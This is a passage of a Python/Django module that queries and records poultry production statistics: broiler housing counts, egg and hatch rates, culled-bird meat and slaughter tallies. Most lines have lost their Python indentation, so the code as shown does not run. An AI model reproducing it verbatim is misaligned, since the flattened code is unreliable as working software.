bf.feedWayName,
bi.RuSheNum,
bi.LivePeriod,
bi.nGeneration,
bi.qzhyFlag,
bi.Remark
FROM
baiyu_introducedinfodetail bi,
baiyu_companyinfo bc,
baiyu_feedway bf,
baiyu_speciesinfo bs
WHERE
bi.CompanyId = bc.id
AND bi.feedWayId = bf.id
AND bi.SpeciesId = bs.id
AND bi.nBirdsType = %d
AND bi.nGeneration = %d
''' % (bird_type,nGen)
try:
cursor.execute(sql)
db_res = cursor.fetchall()
for i in db_res:
introduce_res.append(i)
except Exception as e:
print('Error Reason is :',e)
    print('introduce_res', introduce_res)
return introduce_res
'''
# Get the record count of the grandparent-stock weekly introduction summary table; return type: int
# by sujie 2019/05/27
'''
def get_count_ProgenitorIntroduced(bird_type,nGen):
try:
count = IntroducedInfo.objects.filter(nBirdsType=bird_type,nGeneration=nGen).count()
except Exception as e:
count = 0
print('Error Reason is :',e)
return count
'''
# Get the commercial-generation weekly statistics; return type: list
# by sujie 2019/05/27
'''
def get_sWeekly_statistic():
res = []
try:
db_res = WeeklyStatisticTable.objects.all()
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
'''
# Get the weekly standard parameters for grandparent and parent stock; the generation argument is 1 for grandparent, 2 for parent, 3 for commercial; return type: list
# by sujie 2019/05/30
'''
def get_weekly_standard(nBirdsType,nGeneration):
standard_res = []
with OpenDB() as cursor:
sql = '''
SELECT
bws.WeekNum,
bws.siTaoRate,
bws.ChanDanRate,
bws.RuFuZhongDanRate,
bws.ShouJingRate,
bws.FuHuaRate,
bws.JianChuRate,
bws.SaleRate,
bws.nGeneration,
bs.SpeciesName,
bf.feedWayName,
bws.Remark
FROM
baiyu_weekstandardtable bws
JOIN baiyu_speciesinfo bs
JOIN baiyu_feedway bf
WHERE
bws.SpeciesId = bs.id
AND bws.feedWayId = bf.id
AND bws.nBirdsType = %d
AND bws.nGeneration = %d
''' % (nBirdsType,nGeneration)
try:
cursor.execute(sql)
db_res = cursor.fetchall()
print('****',db_res)
for i in db_res:
standard_res.append(i)
except Exception as e:
print('Error Reason is :',e)
return standard_res
'''
# Get the parent-stock weekly standard parameters; return type: list
# by sujie 2019/05/30
'''
# def get_fumudai_weekly_standard():
# res = []
# try:
# db_res = WeekStandardTable.objects.all()
# for index in db_res:
# res.append(index)
# except Exception as e:
# print('Error Reason is :',e)
# return res
'''
# Get the commercial-generation daily standard parameters; return type: list
# by sujie 2019/05/30
'''
def get_shangpindai_daily_standard(bird_type):
res = []
try:
db_res = DailyStandardTable.objects.all().values().filter(nBirdsType=bird_type)
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
'''
# Get the commercial-generation yearly parameters; return type: list
# by sujie 2019/05/30
'''
def get_shangpindai_yearly_param():
res = []
try:
db_res = YearParameter.objects.all()
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
'''
# Get the overall parameters for grandparent/parent stock; return type: list
# by sujie 2019/05/30
'''
def get_all_param(bird_type,nGeneration):
res = []
try:
db_res = WholeParameter.objects.all().values().filter(nBirdsType=bird_type,nGeneration = nGeneration)
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
'''
# Get the yearly culled-bird meat parameters (grandparent and parent culls)
# by sujie 2019/05/30
'''
def get_tcjirou_param(bird_type,nGeneration):
res = []
try:
db_res = YearTaotaiJirouParam.objects.all().filter(nBirdsType=bird_type,nGeneration = nGeneration)
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
'''
# Get the standard week-date mapping
# by sujie 2019/06/04
'''
def get_weeklydate_standard():
res = []
try:
db_res = WeekDateStandard.objects.all()
for index in db_res:
res.append(index)
except Exception as e:
print('Error Reason is :',e)
return res
###################################################################
'''
#This section computes the various derived metrics 2019-06-28 [email protected]
'''
###################################################################
'''
Get the introduction/housing time list; arguments are the generation and the bird type; returns a list.
get_Rushe_timeList(1,4) fetches the introduction times for grandparent white-feather meat ducks.
Records with flag == 1 are excluded from the calculation; records with flag == 0 are included.
'''
def get_Sum_Rushe_timeList(nGen,nBirdType,save_type):
time_list = []
try:
res = IntroducedInfo.objects.all().values('Year','WeekNum','LivePeriod','RuSheNum','flag').filter(nGeneration=nGen,nBirdsType=nBirdType,nDraftOrOriginal=save_type,flag=0)
for index in res:
time_list.append(index)
except Exception as e:
print('The Error Reason is :',e)
return time_list
def get_Rushe_timeList(nGen,nBirdType,year):
time_list = []
try:
res = IntroducedInfoDetail.objects.all().values('Year','WeekNum','LivePeriod','RuSheNum').filter(nGeneration=nGen,nBirdsType=nBirdType,Year=year)
for index in res:
time_list.append(index)
except Exception as e:
print('The Error Reason is :',e)
return time_list
'''
Given a week (year, week number) and a live period, get the weeks that fall within that period.
Arguments: year, week number, live period; return type: list of the year and week number of every week in the live period.
'''
def get_period_week(year,weekNum,livePeriod=1):
    # data before 2006 is excluded from the calculation, so it starts from the first week of 2006
_year = 2006
time_list = []
try:
index = WeekDateStandard.objects.all().values('id').filter(Year=year,WeekNum=weekNum)[0]['id']
# print('index',index)
except Exception as e:
print('The Error Reason is :',e)
index = 1
limit_start = index - 2
limit_end = limit_start + livePeriod
# print(limit_start,limit_end,'qujian')
try:
res = WeekDateStandard.objects.all().values('Year','WeekNum').order_by('id')[limit_start:limit_end]
# print('res',res)
for item in res:
time_list.append(item)
except Exception as e:
print('The Error Reason is :',e)
time_list = []
return time_list
def get_correct_param_by_week(year,week):
    res = {}
    try:
        res = WeekCorrectionFactor.objects.all().values().filter(Year=year,WeekNum=week)[0]
    except Exception as e:
        print(str(e))
    return res
'''
Insert each week's computed results into baiyu_weeklyCoreTable
Time: 2019-06-28
Author:[email protected]
'''
def insert_baiyu_weekly_core(Year,WeekNum,TotalYuChengCunLan):
pass
'''
Get the housing (RuShe) count for a given year and week.
Arguments: year, week_num; return type: int
'''
def get_rushe_by_week(year,week_num):
try:
rusheNum = IntroducedInfoDetail.objects.values('RuSheNum').filter(Year=year,WeekNum=week_num)[0]['RuSheNum']
except Exception as e:
rusheNum = 0
print('get_rushe_by_week:The Error Reason is :',e)
return rusheNum
'''
# Get the mortality/cull rate for a given week of the production cycle
'''
# def calc_baiyu_weekly_median_core():
# rushe_DateList = get_Rushe_timeList()[0:3]
# for index in rushe_DateList:
#         ##step 1: check whether chicks were housed last week; if so, look up last week's mortality rate
# # print(index['Year'],index['WeekNum'])
# last_week = get_period_week(index['Year'],index['WeekNum'],1)[0]
# print('last_week',last_week)
# last_week_rushe = get_rushe_by_week(last_week['Year'],last_week['WeekNum'])
# current_week_rushe = get_rushe_by_week(index['Year'],index['WeekNum'])
#
# sum_rushe = last_week_rushe + current_week_rushe
# print('Current Rushe is :',sum_rushe)
#         ##step 2: check whether chicks were housed this week; if so, add them directly to last week's post-mortality count
'''
# Get the mortality/cull rate for a given production week; argument: week number; returns the rate
author : [email protected]
date : 2019-07-02
'''
def get_sitaoRate_by_weekCount(week_num):
try:
res = WeekStandardTable.objects.values('siTaoRate').filter(WeekNum=week_num,nGeneration=1)[0]['siTaoRate']
except Exception as e:
res = 0
print('get_sitaoRate_by_weekCount:The Error Reason is:',e,'siTaoLv is invalid !!!')
return res
'''
# Get the weekly production-standard parameters for a given production week; argument: week number; returns the parameter dict
author : [email protected]
date : 2019-07-04
'''
def get_weekly_param_standard(week_num,bird_type,nGen,SpeciesId=6,feedWayId=1):
param_res = {
'SpeciesId' : 1,
'feedWayId' : 1,
'siTaoRate' : 0,
'ChanDanRate' : 0,
'RuFuZhongDanRate' : 0,
'ShouJingRate' : 0,
'FuHuaRate' : 0,
'JianChuRate' : 0,
'SaleRate' : 0
}
try:
param_res = WeekStandardTable.objects.values().filter(WeekNum=week_num,nGeneration=nGen,nBirdsType=bird_type)[0]
except Exception as e:
print('get_weekly_param_standard:The Error Reason is :',e)
return param_res
'''
Get the number of hatching eggs for a given year and week
'''
def get_chandan_num(year,week_num,origin_year,origin_week,bird_type,nGen):
dan_num = 0
try:
dan_num = WeeklyIntroducedMedian.objects.values('TotalDan').filter(Year=year,WeekNum=week_num,originYear=origin_year,originWeek=origin_week,nBirdsType=bird_type,nGeneration=nGen)[0]['TotalDan']
except Exception as e:
print('get_chandan_num:The Error Reason is :',e)
return dan_num
'''
Get the culled-bird standard weight and slaughter rate for a given year; return type: dict
'''
def get_taotaiji_param(year,bird_type,nGen):
param = {}
try:
param = YearTaotaiJirouParam.objects.all().values().filter(nYear=year,nBirdsType=bird_type,nGeneration=nGen)[0]
except Exception as e:
print('get_taotaiji_param:The Error Reason is:',e)
return param
'''
Get the culled-bird standard weight and slaughter rate across all years
'''
def get_taotaiji_param_all(bird_type,nGen):
param = {}
try:
param = YearTaotaiJirouParam.objects.all().values().filter(nBirdsType=bird_type,nGeneration=nGen)
except Exception as e:
print('get_taotaiji_param:The Error Reason is:',e)
return param
# def calc_baiyu_weekly_median_core(bird_type,nGen,CompanyId,SpeciesId,feedWayId,chandan_interval=3):
# # now_time1 = datetime.datetime.now()
# rushe_DateList = get_Rushe_timeList(nGen,bird_type,2006)
# # now_time2 = datetime.datetime.now()
#     ## clear the baiyu_weeklyintroducedmedian table data
# cleanup_weeklyintroducedmedian(bird_type,nGen)
#
# # med_core_data_list = []
#
# for index in rushe_DateList:
#         #from the year, week, and live period, compute the data for every week within the live period
# start_year = index['Year'] #2006
# start_week = index['WeekNum'] #2
# rushe_num = index['RuSheNum'] #15000
#
# for iWeek in range(index['LivePeriod']+3):
# shengchanWeek = iWeek+1
# param = get_weekly_param_standard(iWeek+1,bird_type,nGen,SpeciesId,feedWayId)
#             ##from the start year/week, compute each subsequent week's year and week number, e.g. three weeks after 2006 week 1 is 2006 week 4
# cur_year,cur_week = get_week_info_by_offset(start_year,start_week,iWeek)
# start_date,end_date = get_start_end_date_by_week(cur_year,cur_week)
# yuchengCunlan = 0
# chandanCunlan = 0
# chandanNum = 0
# chuji_num = 0
# real_sale_chuji_num = 0
# TaoTaiJiNum = 0
# taotai_jirou = 0
#
# if iWeek == index['LivePeriod']:
# TaoTaiJiNum = rushe_num
# else:
# TaoTaiJiNum = 0
#
#             ### production weeks before 25 are the rearing stage; from week 25 on, the laying stage
# if iWeek < index['LivePeriod']:
#                 if shengchanWeek < 25: # TODO: 25 should be fetched dynamically
# yuchengCunlan = rushe_num #15000
# chandanCunlan = 0
# else:
# yuchengCunlan = 0
# chandanCunlan = rushe_num
#
#                 ##compute the egg count from the laying-stage inventory
# chandanNum = round(chandanCunlan*param['ChanDanRate']/100*7)
#
# '''
#             get the egg count from three weeks earlier; the incubation period is 21 days, counted as 3 weeks
# '''
# _3week_before_year,_3week_before_weeknum, = get_week_info_by_offset(cur_year,cur_week,chandan_interval*(-1))
# dan_init = get_chandan_num(_3week_before_year, _3week_before_weeknum,start_year,start_week,bird_type,nGen)
# _3week_before_param = get_weekly_param_standard((shengchanWeek-chandan_interval),bird_type,nGen,SpeciesId,feedWayId)
# shoujing_rate = _3week_before_param['ShouJingRate']/100
# rufu_zhongdan_rate = _3week_before_param['RuFuZhongDanRate']/100
# fuhua_rate = _3week_before_param['FuHuaRate']/100
# jianchu_rate = param['JianChuRate']/100
# if nGen == 1:
# chuji_num = round(dan_init*shoujing_rate*rufu_zhongdan_rate*fuhua_rate*jianchu_rate*0.45)
# else:
# chuji_num = round(dan_init * shoujing_rate * rufu_zhongdan_rate * fuhua_rate * jianchu_rate)
# real_sale_chuji_num = chuji_num
#
#
# # print(rushe_num,cur_year,cur_week,shengchanWeek,yuchengCunlan,chandanCunlan,chandanNum,chuji_num,TaoTaiJiNum,taotai_jirou)
# taotaiji_param = get_taotaiji_param(cur_year,bird_type, nGen)
# taotai_jirou = TaoTaiJiNum * taotaiji_param['StandardTZ'] * taotaiji_param['TuZaiRate']*1.0/100
# insertDB_median_baiyu(
# originYear = start_year,
# originWeek = start_week,
# Year = cur_year,
# WeekNum = cur_week,
# startDate = start_date,
# endDate = end_date,
# CompanyId = CompanyId,
# SpeciesId = SpeciesId,
# feedWayId = feedWayId,
# shengchanWeek = shengchanWeek,
# TotalYuChengCunLan = yuchengCunlan,
# TotalChanDanCunLan = chandanCunlan,
# TotalDan = chandanNum,
# TotalChuJi = chuji_num,
# TotalFactSaleChuJi = real_sale_chuji_num,
# TaoTaiJiNum = TaoTaiJiNum,
# dTaoTaiJiRou = taotai_jirou,
# nBirdsType = bird_type,
# nGeneration = nGen,
# )
# rushe_num = round(rushe_num*(100-param['siTaoRate'])/100)
# # WeeklyIntroducedMedian.objects.bulk_create(med_core_data_list)
'''
Compute the rearing-stage and laying-stage inventory for a given year and week
'''
def get_data_from_median(year,week_num,bird_type,nGen):
TotalYuChengCunLan = 0
TotalChanDanCunLan = 0
TotalDan = 0
TotalChuJi = 0
TotalFactSaleChuJi = 0
TaoTaiJiNum = 0
dTaoTaiJiRou = 0
try:
res = WeeklyIntroducedMedian.objects.values().filter(Year=year,
WeekNum=week_num,
nBirdsType=bird_type,
nGeneration=nGen)
for index in res:
TotalYuChengCunLan += index['TotalYuChengCunLan']
TotalChanDanCunLan += index['TotalChanDanCunLan']
TotalDan += index['TotalDan']
TotalChuJi += index['TotalChuJi']
TotalFactSaleChuJi += index['TotalFactSaleChuJi']
TaoTaiJiNum += index['TaoTaiJiNum']
dTaoTaiJiRou += index['dTaoTaiJiRou']
except Exception as e:
print('get_data_total_from_median:The Error Reason is :',e)
return TotalYuChengCunLan,TotalChanDanCunLan,TotalDan,TotalChuJi,TotalFactSaleChuJi,TaoTaiJiNum,dTaoTaiJiRou
'''
Compute the summed rearing-stage and laying-stage inventory for a given year and week
'''
def get_data_sum_from_median(year,week_num,bird_type,nGen,save_type):
data_med = {
'TotalYuChengCunLan':0,
'TotalChanDanCunLan':0,
'TotalDan':0,
'TotalChuJi':0,
'TotalFactSaleChuJi':0,
'TaoTaiJiNum':0,
'dTaoTaiJiRou':0
}
try:
res = WeeklyIntroducedSumMedian.objects.values().filter(Year=year,WeekNum=week_num,nBirdsType=bird_type,nGeneration=nGen,nDraftOrOriginal=save_type)
for index in res:
data_med['TotalYuChengCunLan'] += index['TotalYuChengCunLan']
data_med['TotalChanDanCunLan'] += index['TotalChanDanCunLan']
data_med['TotalDan'] += index['TotalDan']
data_med['TotalChuJi'] += index['TotalChuJi']
data_med['TotalFactSaleChuJi'] += index['TotalFactSaleChuJi']
data_med['TaoTaiJiNum'] += index['TaoTaiJiNum']
data_med['dTaoTaiJiRou'] += index['dTaoTaiJiRou']
except Exception as e:
print('get_data_total_from_median:The Error Reason is :',e)
return data_med
'''
Given a year, a week number, and an offset (how many weeks after the current week), get the year and week number at that offset
'''
def get_week_info_by_offset(current_year,current_weeknum,offset):
    dest_year = current_year
    dest_weeknum = current_weeknum
    try:
        index = WeekDateStandard.objects.all().values('id').filter(Year=current_year, WeekNum=current_weeknum)[0]['id']
    except Exception as e:
        print('The Error Reason is :', e)
        index = 1
    try:
        res = WeekDateStandard.objects.values('Year','WeekNum').filter(id=index+offset)[0]
        dest_year = res['Year']
        dest_weeknum = res['WeekNum']
    except Exception as e:
        print(e)
    return dest_year,dest_weeknum
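# e.g. get_week_info_by_offset(2006, 1, 3) -> (2006, 4), per the week-date table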
'''
Insert a record into the white-feather broiler weekly median table
'''
def insertDB_median_baiyu(**kwargs):
param_init = {
'originYear':0,
'originWeek':0,
'Year':2050,
'WeekNum':1,
'startDate':'2050-01-01',
'endDate':'2050-01-07',
'CompanyId':14,
'SpeciesId':6,
'feedWayId':1,
'shengchanWeek': 0,
'TotalYuChengCunLan':0,
'TotalChanDanCunLan':0,
'TotalDan':0,
'TotalChuJi':0,
'TotalFactSaleChuJi':0,
'TaoTaiJiNum':0,
'dTaoTaiJiRou':0,
'nGeneration':1,
'nDraftOrOriginal':1,
'nBirdsType':1,
'Remark':''
}
for key in kwargs:
if key in param_init.keys():
param_init[key] = kwargs[key]
else:
pass
WeeklyIntroducedMedian.objects.create(
originYear = param_init['originYear'],
originWeek = param_init['originWeek'],
Year = param_init['Year'],
WeekNum = param_init['WeekNum'],
startDate = param_init['startDate'],
endDate = param_init['endDate'],
CompanyId = param_init['CompanyId'],
SpeciesId = param_init['SpeciesId'],
feedWayId = param_init['feedWayId'],
shengchanWeek = param_init['shengchanWeek'],
TotalYuChengCunLan = param_init['TotalYuChengCunLan'],
TotalChanDanCunLan = param_init['TotalChanDanCunLan'],
TotalDan = param_init['TotalDan'],
TotalChuJi = param_init['TotalChuJi'],
TotalFactSaleChuJi = param_init['TotalFactSaleChuJi'],
TaoTaiJiNum = param_init['TaoTaiJiNum'],
dTaoTaiJiRou = param_init['dTaoTaiJiRou'],
nGeneration = param_init['nGeneration'],
nDraftOrOriginal = param_init['nDraftOrOriginal'],
nBirdsType = param_init['nBirdsType'],
Remark = param_init['Remark']
)
def cleanup_weeklyintroducedmedian(bird_type,nGen):
try:
res = WeeklyIntroducedMedian.objects.all().filter(nBirdsType=bird_type,nGeneration=nGen).delete()
except Exception as e:
print("insertDB_median_baiyu:The Error Reason is :", e)
return
def cleanup_weeklycoretable(bird_type,nGen,save_type):
try:
res = WeeklyCoreTable.objects.all().filter(nBirdsType=bird_type,nGeneration=nGen,nDraftOrOriginal=save_type).delete()
except Exception as e:
print("insertDB_median_baiyu:The Error Reason is :", e)
return
def insertDB_weekly_core_baiyu(**kwargs):
param_init = {
'Year':2050,
'WeekNum':1,
'startDate':'1000-01-01',
'endDate':'1000-01-01',
'TotalYuChengCunLan':0,
'TotalChanDanCunLan':0,
'TotalDan':0,
'TotalChuJi':0,
'TotalFactSaleChuJi':0,
'TaoTaiJiNum':0,
'dTaoTaiJiRou':0,
'nGeneration':1,
'nDraftOrOriginal':1,
'nBirdsType':1,
'Remark':''
}
for key in kwargs:
if key in param_init.keys():
param_init[key] = kwargs[key]
else:
pass
try:
WeeklyCoreTable.objects.create(
Year = param_init['Year'],
WeekNum = param_init['WeekNum'],
startDate = param_init['startDate'],
endDate = param_init['endDate'],
TotalYuChengCunLan = param_init['TotalYuChengCunLan'],
TotalChanDanCunLan = param_init['TotalChanDanCunLan'],
TotalDan = param_init['TotalDan'],
TotalChuJi = param_init['TotalChuJi'],
TotalFactSaleChuJi = param_init['TotalFactSaleChuJi'],
TaoTaiJiNum = param_init['TaoTaiJiNum'],
dTaoTaiJiRou = param_init['dTaoTaiJiRou'],
nGeneration = param_init['nGeneration'],
nDraftOrOriginal = param_init['nDraftOrOriginal'],
nBirdsType = param_init['nBirdsType'],
Remark = param_init['Remark']
)
except Exception as e:
print("The Error Reason is :", e)
'''
Get the start and end dates of a given year and week
'''
def get_start_end_date_by_week(year,week_num):
try:
res = WeekDateStandard.objects.values('startDate','endDate').filter(Year=year,WeekNum=week_num)[0]
start_date = res['startDate']
end_date = res['endDate']
except Exception as e:
start_date = '1000-01-01'
end_date = '1000-01-01'
print('get_start_end_date_by_week:The Error Reason is:',e)
return start_date,end_date
def get_company_info():
res = []
try:
res = CompanyInfo.objects.all().values()
except Exception as e:
print('get_company_info:The Error Reason is:',e)
return res
def get_company_info_by_id(company_id):
res = []
try:
res = CompanyInfo.objects.values().filter(id = company_id)
except Exception as e:
print(e)
return res
def get_feedway_info():
res = []
try:
res = FeedWay.objects.all().values()
except Exception as e:
print("get_feedway_info:The Error Reason is:",e)
return res
def get_species_info():
result = []
try:
result = SpeciesInfo.objects.all().values()
except Exception as e:
print('get_species_info:The Error Reason is:',e)
return result
'''
Get the number of day-old grandparent-stock chicks
'''
def get_zudai_chuji_info():
chuji_list = []
zd_res = WeeklyCoreTable.objects.values('Year','WeekNum','TotalFactSaleChuJi')
for index in zd_res:
# print(index['Year'],index['WeekNum'],index['TotalFactSaleChuJi'])
chuji_list.append(index)
return chuji_list
'''
Insert the grandparent-stock day-old chick counts as parent-stock introductions
'''
def fumudai_introduced_info(*args):
pass
def insertDB_introduced_detail_info(**kwargs):
if not kwargs:
print('no valid kwargs')
return
else:
print('database would be updated')
init_param ={
'Year':0,
'WeekNum':0,
'startDate':'1000-1-1',
'endDate':'1000-1-1',
'CompanyId':0,
'SpeciesId':0,
'feedWayId':0,
'RuSheNum':0,
'LivePeriod':0,
'qzhyFlag':0,
'huanyuRate':0,
'qzhyStartWeek':0,
'HuanyuInterval':0,
'qzhyPeriod':0,
'nGeneration':0,
'nDraftOrOriginal':0,
'nBirdsType':0,
'Remark':0
}
for key in kwargs:
if key in init_param.keys():
init_param[key] = kwargs[key]
else:
            print('Keeping the original key and value!')
IntroducedInfoDetail.objects.create(
Year=init_param['Year'],
WeekNum=init_param['WeekNum'],
startDate=init_param['startDate'],
endDate=init_param['endDate'],
CompanyId=init_param['CompanyId'],
SpeciesId=init_param['SpeciesId'],
feedWayId=init_param['feedWayId'],
RuSheNum=init_param['RuSheNum'],
LivePeriod=init_param['LivePeriod'],
qzhyFlag=init_param['qzhyFlag'],
huanyuRate=init_param['huanyuRate'],
qzhyStartWeek=init_param['qzhyStartWeek'],
HuanyuInterval=init_param['HuanyuInterval'],
qzhyPeriod=init_param['qzhyPeriod'],
nGeneration=init_param['nGeneration'],
nDraftOrOriginal=init_param['nDraftOrOriginal'],
nBirdsType=init_param['nBirdsType'],
Remark=init_param['Remark']
)
def insertDB_introduced_sum_info(**kwargs):
if not kwargs:
print('no valid kwargs')
return
else:
print('database would be updated')
init_param ={
'Year':0,
'WeekNum':0,
'startDate':'1000-1-1',
'endDate':'1000-1-1',
'RuSheNum':0,
'LivePeriod':0,
'nGeneration':0,
'nDraftOrOriginal':0,
'nBirdsType':0,
'Remark':0,
'flag':0
}
for key in kwargs:
if key in init_param.keys():
init_param[key] = kwargs[key]
else:
            print('Keeping the original key and value!')
IntroducedInfo.objects.create(
Year=init_param['Year'],
WeekNum=init_param['WeekNum'],
startDate=init_param['startDate'],
endDate=init_param['endDate'],
RuSheNum=init_param['RuSheNum'],
LivePeriod=init_param['LivePeriod'],
nGeneration=init_param['nGeneration'],
nDraftOrOriginal=init_param['nDraftOrOriginal'],
nBirdsType=init_param['nBirdsType'],
Remark=init_param['Remark']
)
def clean_introducd_info(bird_type,nGen):
try:
res = IntroducedInfo.objects.all().filter(nBirdsType=bird_type,nGeneration=nGen).delete()
except Exception as e:
print("clean_introducd_info:The Error Reason is:",str(e))
return
'''
Slaughter-count and meat-volume statistics (detail insert)
'''
def insertDB_weekly_detail_statistics(**kwargs):
param_init = {
'Year': 0,
'WeekNum': 0,
'startDate': '1000-01-01',
'endDate': '1000-01-01',
'CunlLanNum35': 0,
'CunlLanNum42': 0,
'CunlLanNum49': 0,
'CunlLanNum56': 0,
'ChuLanRouJiNum35': 0,
'ChuLanRouJiNum42': 0,
'ChuLanRouJiNum49': 0,
'ChuLanRouJiNum56': 0,
'TotalChuLanRouJiNum': 0,
'HuoZhong35': 0,
'HuoZhong42': 0,
'HuoZhong49': 0,
'HuoZhong56': 0,
'TotalHuoZhong': 0,
'JiRou35': 0,
'JiRou42': 0,
'JiRou49': 0,
'JiRou56': 0,
'TotalJiRou': 0,
'JiXiong35': 0,
'JiXiong42': 0,
'JiXiong49': 0,
'JiXiong56': 0,
'TotalJiXiong': 0,
'JiChi35': 0,
'JiChi42': 0,
'JiChi49': 0,
'JiChi56': 0,
'TotalJiChi': 0,
'JiTui35': 0,
'JiTui42': 0,
'JiTui49': 0,
'JiTui56': 0,
'TotalJiTui': 0,
'JiGuJia35': 0,
'JiGuJia42': 0,
'JiGuJia49': 0,
'JiGuJia56': 0,
'TotalJiGuJia': 0,
'JiNeiZang35': 0,
'JiNeiZang42': 0,
'JiNeiZang49': 0,
'JiNeiZang56': 0,
'TotalJiNeiZang': 0,
'nDraftOrOriginal': 1,
'nBirdsType':1,
'Remark': '',
}
for key in kwargs:
if key in param_init.keys():
param_init[key] = kwargs[key]
else:
pass
WeeklyStatisticDetail.objects.create(
Year=param_init['Year'],
WeekNum=param_init['WeekNum'],
startDate=param_init['startDate'],
endDate=param_init['endDate'],
CunlLanNum35=param_init['CunlLanNum35'],
CunlLanNum42=param_init['CunlLanNum42'],
CunlLanNum49=param_init['CunlLanNum49'],
CunlLanNum56=param_init['CunlLanNum56'],
ChuLanRouJiNum35=param_init['ChuLanRouJiNum35'],
ChuLanRouJiNum42=param_init['ChuLanRouJiNum42'],
ChuLanRouJiNum49=param_init['ChuLanRouJiNum49'],
ChuLanRouJiNum56=param_init['ChuLanRouJiNum56'],
TotalChuLanRouJiNum=param_init['TotalChuLanRouJiNum'],
HuoZhong35=param_init['HuoZhong35'],
HuoZhong42=param_init['HuoZhong42'],
HuoZhong49=param_init['HuoZhong49'],
HuoZhong56=param_init['HuoZhong56'],
TotalHuoZhong=param_init['TotalHuoZhong'],
JiRou35=param_init['JiRou35'],
JiRou42=param_init['JiRou42'],
JiRou49=param_init['JiRou49'],
JiRou56=param_init['JiRou56'],
TotalJiRou=param_init['TotalJiRou'],
JiXiong35=param_init['JiXiong35'],
JiXiong42=param_init['JiXiong42'],
JiXiong49=param_init['JiXiong49'],
JiXiong56=param_init['JiXiong56'],
TotalJiXiong=param_init['TotalJiXiong'],
JiChi35=param_init['JiChi35'],
JiChi42=param_init['JiChi42'],
JiChi49=param_init['JiChi49'],
JiChi56=param_init['JiChi56'],
TotalJiChi=param_init['TotalJiChi'],
JiTui35=param_init['JiTui35'],
JiTui42=param_init['JiTui42'],
JiTui49=param_init['JiTui49'],
JiTui56=param_init['JiTui56'],
TotalJiTui=param_init['TotalJiTui'],
JiGuJia35=param_init['JiGuJia35'],
JiGuJia42=param_init['JiGuJia42'],
JiGuJia49=param_init['JiGuJia49'],
JiGuJia56=param_init['JiGuJia56'],
TotalJiGuJia=param_init['TotalJiGuJia'],
JiNeiZang35=param_init['JiNeiZang35'],
JiNeiZang42=param_init['JiNeiZang42'],
JiNeiZang49=param_init['JiNeiZang49'],
JiNeiZang56=param_init['JiNeiZang56'],
TotalJiNeiZang=param_init['TotalJiNeiZang'],
nDraftOrOriginal=param_init['nDraftOrOriginal'],
nBirdsType=param_init['nBirdsType'],
Remark=param_init['Remark']
)
'''
Statistics of slaughter counts and meat output (weekly summary).
'''
def insertDB_weekly_statistics(**kwargs):
param_init = {
'Year': 0,
'WeekNum': 0,
'startDate': '1000-01-01',
'endDate': '1000-01-01',
'CunlLanNum35': 0,
'CunlLanNum42': 0,
'CunlLanNum49': 0,
'CunlLanNum56': 0,
'ChuLanRouJiNum35': 0,
'ChuLanRouJiNum42': 0,
'ChuLanRouJiNum49': 0,
'ChuLanRouJiNum56': 0,
'TotalChuLanRouJiNum': 0,
'HuoZhong35': 0,
'HuoZhong42': 0,
'HuoZhong49': 0,
'HuoZhong56': 0,
'TotalHuoZhong': 0,
'JiRou35': 0,
'JiRou42': 0,
'JiRou49': 0,
'JiRou56': 0,
'TotalJiRou': 0,
'JiXiong35': 0,
'JiXiong42': 0,
'JiXiong49': 0,
'JiXiong56': 0,
'TotalJiXiong': 0,
'JiChi35': 0,
'JiChi42': 0,
'JiChi49': 0,
'JiChi56': 0,
'TotalJiChi': 0,
'JiTui35': 0,
'JiTui42': 0,
'JiTui49': 0,
'JiTui56': 0,
'TotalJiTui': 0,
'JiGuJia35': 0,
'JiGuJia42': 0,
'JiGuJia49': 0,
'JiGuJia56': 0,
'TotalJiGuJia': 0,
'JiNeiZang35': 0,
'JiNeiZang42': 0,
'JiNeiZang49': 0,
'JiNeiZang56': 0,
'TotalJiNeiZang': 0,
'nDraftOrOriginal': 1,
'nBirdsType':1,
'Remark': '',
}
for key in kwargs:
if key in param_init.keys():
param_init[key] = kwargs[key]
else:
pass
WeeklyStatisticTable.objects.create(
Year=param_init['Year'],
WeekNum=param_init['WeekNum'],
startDate=param_init['startDate'],
endDate=param_init['endDate'],
CunlLanNum35=param_init['CunlLanNum35'],
CunlLanNum42=param_init['CunlLanNum42'],
CunlLanNum49=param_init['CunlLanNum49'],
CunlLanNum56=param_init['CunlLanNum56'],
ChuLanRouJiNum35=param_init['ChuLanRouJiNum35'],
ChuLanRouJiNum42=param_init['ChuLanRouJiNum42'],
ChuLanRouJiNum49=param_init['ChuLanRouJiNum49'],
ChuLanRouJiNum56=param_init['ChuLanRouJiNum56'],
TotalChuLanRouJiNum=param_init['TotalChuLanRouJiNum'],
HuoZhong35=param_init['HuoZhong35'],
HuoZhong42=param_init['HuoZhong42'],
HuoZhong49=param_init['HuoZhong49'],
HuoZhong56=param_init['HuoZhong56'],
TotalHuoZhong=param_init['TotalHuoZhong'],
JiRou35=param_init['JiRou35'],
JiRou42=param_init['JiRou42'],
JiRou49=param_init['JiRou49'],
JiRou56=param_init['JiRou56'],
TotalJiRou=param_init['TotalJiRou'],
JiXiong35=param_init['JiXiong35'],
JiXiong42=param_init['JiXiong42'],
JiXiong49=param_init['JiXiong49'],
JiXiong56=param_init['JiXiong56'],
TotalJiXiong=param_init['TotalJiXiong'],
JiChi35=param_init['JiChi35'],
JiChi42=param_init['JiChi42'],
JiChi49=param_init['JiChi49'],
JiChi56=param_init['JiChi56'],
TotalJiChi=param_init['TotalJiChi'],
JiTui35=param_init['JiTui35'],
JiTui42=param_init['JiTui42'],
JiTui49=param_init['JiTui49'],
JiTui56=param_init['JiTui56'],
TotalJiTui=param_init['TotalJiTui'],
JiGuJia35=param_init['JiGuJia35'],
JiGuJia42=param_init['JiGuJia42'],
JiGuJia49=param_init['JiGuJia49'],
JiGuJia56=param_init['JiGuJia56'],
TotalJiGuJia=param_init['TotalJiGuJia'],
JiNeiZang35=param_init['JiNeiZang35'],
JiNeiZang42=param_init['JiNeiZang42'],
JiNeiZang49=param_init['JiNeiZang49'],
JiNeiZang56=param_init['JiNeiZang56'],
TotalJiNeiZang=param_init['TotalJiNeiZang'],
nDraftOrOriginal=param_init['nDraftOrOriginal'],
